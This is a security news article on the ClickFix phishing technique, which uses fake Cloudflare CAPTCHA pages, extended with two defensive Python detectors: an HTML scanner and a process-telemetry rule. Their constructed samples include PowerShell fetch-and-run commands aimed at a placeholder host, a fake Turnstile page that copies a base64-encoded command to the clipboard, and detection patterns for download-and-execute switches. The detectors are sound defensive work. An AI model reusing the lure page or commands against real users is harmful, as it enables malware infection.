- ClickFix uses fake CAPTCHA screens to trick users into launching malware with a few simple keystrokes
- The phishing pages mimic Cloudflare perfectly, all the way down to Ray IDs and padlock icons
- Clicking "Confirm that you are human" starts a chain that silently infects the victim's machine with malware
A sophisticated yet deceptively simple phishing technique is currently circulating that uses fake Cloudflare CAPTCHA pages to infect users with malware.
New research from SlashNext says the technique, known as ClickFix, exploits familiar internet behaviour to trick users into running commands that install malicious software.
ClickFix works by presenting a counterfeit version of Cloudflare's Turnstile CAPTCHA page. Everything from the visual layout to technical elements such as the Ray ID identifier is replicated convincingly.
A prompt users would not normally scrutinize
The phishing page may be hosted on a domain that looks legitimate, or on a real site that has been compromised.
When users land on the page, they are asked to tick a box labelled "Confirm that you are human." This step feels routine and raises no suspicion, but what follows is the essence of the scam: users are walked through a short set of instructions, press Win+R, then Ctrl+V, then Enter.
These steps seem harmless, but they run a PowerShell command that the page has already silently copied to the user's clipboard.
Once executed, the command can fetch malware such as Stealc, Lumma, or even remote access trojans such as NetSupport Manager.
"ClickFix is a social engineering attack that tricks users into running malicious commands on their own devices, all under the guise of a routine security check," said security researcher Daniel Kelley.
What makes ClickFix especially insidious is how it turns standard web security cues against the user. The padlock icon, the familiar CAPTCHA format and a legitimate-looking URL all serve to lull users into compliance.
It exploits what researchers call "verification fatigue": a user's tendency to click through security prompts without proper scrutiny.
The trick does not rely on exploiting a software vulnerability, but on abusing trust and habitual behaviour.
The phishing page is delivered as a single HTML file, but it contains embedded scripts and obfuscated code designed to perform the clipboard injection.
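The clipboard injection described above leaves fingerprints in the HTML file itself: a script that writes to the clipboard, a command for a Windows script host (often hidden behind a base64 literal), and lure text telling the victim which keys to press. The following static scanner is an added example written for this article, not SlashNext's tooling or a sample from a real campaign. The indicator patterns are my own choices, and both pages it scans are constructed inline (the "malicious" one stages a placeholder command against `example.invalid`).

```python
import base64
import re

# Indicator patterns (my own, not from the research); applied to lower-cased text.
CLIPBOARD = [r"navigator\.clipboard\.writetext", r"execcommand\(\s*['\"]copy['\"]\s*\)",
             r"clipboarddata\.setdata"]
COMMAND = [r"powershell(?:\.exe)?", r"\bpwsh\b", r"-w(?:indow(?:style)?)?\s+hidden", r"\biex\b",
           r"invoke-expression", r"\birm\b", r"\biwr\b", r"invoke-webrequest", r"invoke-restmethod",
           r"-enc(?:odedcommand)?\b", r"cmd(?:\.exe)?\s*/c"]
LURE = [r"verify you are human", r"confirm that you are human", r"ray id", r"turnstile", r"cloudflare"]
KEYS = [r"win(?:dows)?\s*(?:key)?\s*\+\s*r\b", r"ctrl\s*\+\s*v\b"]


def _hits(patterns, text):
    """Return the matched text for every pattern that occurs in text."""
    hits = []
    for p in patterns:
        m = re.search(p, text)
        if m:
            hits.append(m.group(0))
    return hits


def _decoded_base64(text):
    """Decode long base64-looking literals so a command hidden behind atob() is still scanned."""
    found = []
    for m in re.finditer(r"[A-Za-z0-9+/]{24,}={0,2}", text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(c.isprintable() or c in "\r\n\t" for c in s):
                found.append(s)
                break
    return found


def scan_html(html):
    """Classify a single HTML file: scripts are checked for clipboard writes and
    script-host commands, the visible text for CAPTCHA lure and keystroke instructions."""
    scripts = re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I)
    script_text = "\n".join(scripts)
    script_text += "\n" + "\n".join(_decoded_base64(script_text))
    no_scripts = re.sub(r"<script\b.*?</script>", " ", html, flags=re.S | re.I)
    visible = re.sub(r"<[^>]+>", " ", no_scripts)
    script_l, visible_l = script_text.lower(), visible.lower()
    result = {
        "clipboard": _hits(CLIPBOARD, script_l),
        "command": _hits(COMMAND, script_l),
        "lure": _hits(LURE, visible_l),
        "keys": _hits(KEYS, visible_l),
    }
    if result["clipboard"] and result["command"]:
        result["verdict"] = "clickfix-like"   # clipboard write + shell command = the pattern in this article
    elif result["command"] or (result["clipboard"] and (result["lure"] or result["keys"])):
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "benign"
    return result


# --- Constructed samples (not real phishing pages) -----------------------------------
SAMPLE_COMMAND = 'powershell -w hidden -c "iwr http://example.invalid/stage | iex"'  # placeholder host
_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode()).decode()

# Fake Turnstile-style page: the checkbox click copies the command and reveals the key sequence.
SAMPLE_PAGE = """<html><body>
<div class="cf-box"><h1>Verify you are human</h1>
<input type="checkbox" id="cb"> <label for="cb">Confirm that you are human</label>
<p>Ray ID: 8f1c2d3e4a5b6c7d</p>
<div id="steps" style="display:none">Press Win + R, then Ctrl + V, then Enter</div></div>
<script>
document.getElementById("cb").addEventListener("click", function () {
  var cmd = atob("%s");
  navigator.clipboard.writeText(cmd);
  document.getElementById("steps").style.display = "block";
});
</script></body></html>""" % _ENCODED

# Ordinary "copy link" button: clipboard use alone must not trigger the verdict.
BENIGN_PAGE = """<html><body><h1>Share this page</h1><button id="copy">Copy link</button>
<script>document.getElementById("copy").addEventListener("click", function () {
  navigator.clipboard.writeText(location.href); });</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page))
```

The verdict deliberately requires both a clipboard write and a script-host command in the same file: many legitimate pages copy text to the clipboard, and decoding base64 literals is what keeps the "veiled" variant from slipping past the command check.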
Because it uses legitimate Windows tools and does not drop an executable file itself, it can evade many traditional detection tools.
Standard defences such as antivirus or endpoint protection are typically built to catch suspicious downloads or binaries. In this case, though, users are tricked into launching the threat themselves.
This highlights the need for advanced malware protection with zero-hour defences capable of detecting clipboard injection and fake CAPTCHA screens in real time.
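Even when the file-based layer misses it, the user-driven launch described in this article is visible in process telemetry: the Run dialog opened with Win+R hands the pasted command to a PowerShell process whose parent is explorer.exe, and that command line carries download-and-execute indicators. The detector below is an added example for this article, not a vendor rule. It assumes Sysmon Event ID 1 style fields (parent image, image, command line) and that the Run dialog launches from explorer.exe; the events it consumes are constructed inline, with `example.invalid` as a placeholder host, and the indicator lists are my own.

```python
import base64
import re

# Assumption: Win+R's Run dialog spawns its target from explorer.exe.
USER_SHELL_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Fetch-and-run indicators (my own list); any one of these is enough to alert on the chain.
RUN_FROM_NETWORK = [r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod", r"\biwr\b",
                    r"invoke-webrequest", r"downloadstring", r"downloadfile", r"https?://"]
# Evasion switches recorded as extra context on the alert.
EVASION = [r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-noprofile", r"-ep\s+bypass",
           r"-executionpolicy\s+bypass", r"-enc", r"frombase64string"]


def _found(patterns, text):
    hits = []
    for p in patterns:
        m = re.search(p, text)
        if m:
            hits.append(m.group(0))
    return hits


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand (-e/-ec/-enc) argument, which PowerShell
    expects as base64 of UTF-16LE, or None when the command line has none."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_clickfix(events):
    """Alert on explorer.exe -> PowerShell launches whose (decoded) command line fetches
    and runs content from the network. Returns one alert dict per matching event."""
    alerts = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent not in USER_SHELL_PARENTS or image not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        text = (ev["cmdline"] + " " + (decoded or "")).lower()
        network = _found(RUN_FROM_NETWORK, text)
        if not network:
            continue  # a user simply opening a PowerShell window from Run is not an alert
        alerts.append({"event_id": ev["id"], "image": image, "network": network,
                       "evasion": _found(EVASION, text), "decoded": decoded})
    return alerts


# --- Constructed process-creation events (not real telemetry) ----------------------------
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode("iwr http://example.invalid/x | iex".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # 1: the ClickFix chain in the clear
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -c "irm http://example.invalid/s | iex"'},
    # 2: the same chain hidden behind -enc; only visible after decoding
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -nop -enc " + _ENCODED},
    # 3: scheduled admin script; wrong parent and no network fetch
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    # 4: user opened an interactive console from Run; nothing fetched
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell"},
    # 5: unrelated process
    {"id": 5, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

On a real host the Run dialog also records what was typed or pasted under the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is useful corroboration during incident response when the process event alone is ambiguous.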